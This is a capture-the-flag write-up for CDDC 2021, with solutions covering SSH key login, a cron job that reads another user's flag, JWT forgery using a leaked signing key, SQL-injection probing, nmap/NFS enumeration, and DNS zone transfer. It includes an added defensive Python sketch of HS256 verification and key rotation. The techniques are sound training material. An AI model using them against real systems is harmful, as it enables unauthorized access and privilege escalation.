# CDDC 2021
## Linux Rules the World!
### Opening the Gate
Target IP: 13.213.192.83
File with SSH key: http://157.230.245.61/0x0302/nQE0XQ/m1/file.zip
```
# Note.txt
Notice
1. As part of the ZIP file, you will find a text file that can be used to connect to the target machine.
2. Each one of the flags is the password for the next user. Your main goal is to access the last user account.
3. The flags are located in the user home folders.
4. The passphrase for the SSH key is: q1w2e3r4
```
```
chmod 700 bot1.key
ssh -i bot1.key bot1@13.213.192.83
cat flag.txt
```
The SSH key passphrase `q1w2e3r4` is given in `file.zip`.
Flag: `CDDC21{S$H_keYs_are_Be!ter_than_PaSSw0rds}`
## Scrambled Eggs
```
grep -E 'CDDC21\{.*\}' data
```
Flag: `CDDC21{Th1s_!s_IT}`
## Another Path
Tried to check cron jobs: `crontab -e`
`* * * * * root sudo cat /home/bot3/flag.txt > /run/screen/result`
## Web Takedown Part 1
### Integrity
Target url: http://122.248.246.76/8NR7Z67K
Analysing cookie:
`token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwibmFtZSI6IkN5YmVyQm90MyIsImlhdCI6IiAxNjIzODY3NDg3IiwiaXNfYWRtaW4iOiIwIn0.YBMeZkOWZOju82ZKeMoIXHi425jocpr0axMm8MlASVE`
Found note in `staged.js`:
```
/*
John, the next generation platform is going to be deployed next week.
Make sure to review all the backup files in "/stage-03-03/".
*/
```
`dirsearch -u http://122.248.246.76/8NR7Z67K/stage-03-03`
Found http://122.248.246.76/8NR7Z67K/stage-03-03/index.php~:
```
"admin" "name"=> "CyberBot3" "iat"=>" 1623867487" "is_admin" => "0" );
$key = "sup3rw0rldk3y";
$jwt = JWT::encode($payload, $key);
setcookie("token", $jwt);
if (isset($_POST['sub']) && !empty($_POST['username'])){
    if ($_POST['username'] != "admin"){
        echo "
The ".$user." is doesnt exsits
";
    } else {
        echo "
The password for ".$user." is incorrect.
";
    }
}
?>
```
Modify JWT:
```
python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwibmFtZSI6IkN5YmVyQm90MyIsImlhdCI6IiAxNjIzODY3NDg3IiwiaXNfYWRtaW4iOiIwIn0.YBMeZkOWZOju82ZKeMoIXHi425jocpr0axMm8MlASVE -T -S hs256 -p sup3rw0rldk3y
```
New JWT token after changing `is_admin = "0"` to `is_admin = "1"`: `eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwibmFtZSI6IkN5YmVyQm90MyIsImlhdCI6IiAxNjIzODY3NDg3IiwiaXNfYWRtaW4iOiIxIn0.LFqk2Y2nJ4cGTNIr7a0iBdnAZ3WNvy34Z4_eHq0mumk`
Flag: `CDDC21{jWT_h4S_b33N_pwN3DD}`
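
Why the re-signed cookie was accepted, seen from the verifier's side, as an added example that is not part of the original write-up or the challenge code: a minimal HS256 verifier showing that a claim edit fails without the key, passes once the key has leaked, and is rejected again after key rotation. `sign_hs256`, `verify_hs256` and `demo` are names made up for this sketch; the key and claims are the ones shown above.

```python
import base64, hashlib, hmac, json, secrets

LEAKED_KEY = b"sup3rw0rldk3y"  # key shown in the page's index.php~
# Claims as decoded from the page's cookie
CLAIMS = {"username": "admin", "name": "CyberBot3", "iat": " 1623867487", "is_admin": "0"}

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def sign_hs256(claims: dict, key: bytes) -> str:
    """Issue a compact HS256 JWT: base64url(header).base64url(claims).base64url(HMAC)."""
    header = b64url(json.dumps({"typ": "JWT", "alg": "HS256"}, separators=(",", ":")).encode())
    body = b64url(json.dumps(claims, separators=(",", ":")).encode())
    mac = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url(mac)}"

def verify_hs256(token: str, key: bytes):
    """Return the claims if token is a valid HS256 JWT under key, else None."""
    try:
        header_b64, body_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
        if header.get("alg") != "HS256":  # pin the algorithm, never trust the header
            return None
        expected = hmac.new(key, f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
            return None
        return json.loads(b64url_decode(body_b64))
    except (ValueError, TypeError, AttributeError):
        return None

def demo() -> dict:
    """Compare a spliced token, a re-signed token, and both after key rotation."""
    issued = sign_hs256(CLAIMS, LEAKED_KEY)
    altered = sign_hs256({**CLAIMS, "is_admin": "1"}, LEAKED_KEY)
    # Edited claims carrying the old signature: what an edit without the key yields
    spliced = altered.rsplit(".", 1)[0] + "." + issued.rsplit(".", 1)[1]
    rotated_key = secrets.token_bytes(32)  # fresh random key after the leak
    return {
        "spliced_accepted": verify_hs256(spliced, LEAKED_KEY) is not None,
        "altered_accepted_with_leaked_key": verify_hs256(altered, LEAKED_KEY) is not None,
        "altered_accepted_after_rotation": verify_hs256(altered, rotated_key) is not None,
        "issued_accepted_after_rotation": verify_hs256(issued, rotated_key) is not None,
    }

if __name__ == "__main__":
    print(demo())
```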
### Bypass
The password field does not allow spaces.
When keying in a normal password, the page shows `No row`.
An empty form gives no feedback.
A `POST` request returns 500 when `'` is in the password field.
## Post-Mortem
### Look Closer
Decode text file from base64
## Going Active
### UnKnown
Port 666
Unzip `.zip`, extract `.tar`
Flag: `CDDC21{Y0u_Figu4ed_IT_0UT}`
### Mounting
```
$ nmap 178.128.118.134 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-24 16:04 +08
Nmap scan report for 178.128.118.134
Host is up (0.012s latency).
Not shown: 994 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
111/tcp open rpcbind 2-4 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
2049/tcp open nfs_acl 3 (RPC #100227)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
$ showmount -e 178.128.118.134
Export list for 178.128.118.134:
/var/nfs/backup *
```
## Let's Go Hunting
### Broken System
```
dig axfr cryptit.biz @ns2.cryptit.biz
```
Flag: `CDDC21{_10x_f0r_yOur_Serv!ce_}`
###
Found https://www.youtube.com/watch?v=XP5DJ55LXRM with email `teslareactor7@gmail.com`
## Behind the Mask
### Light
Domain name: `7C60.LOCAL`
## Break It Down
### Never
Test XOR on data via rolling window to find candidates.
Key: 111970
Flag: `CDDC21{It_@ll_$tarted_Th3n}`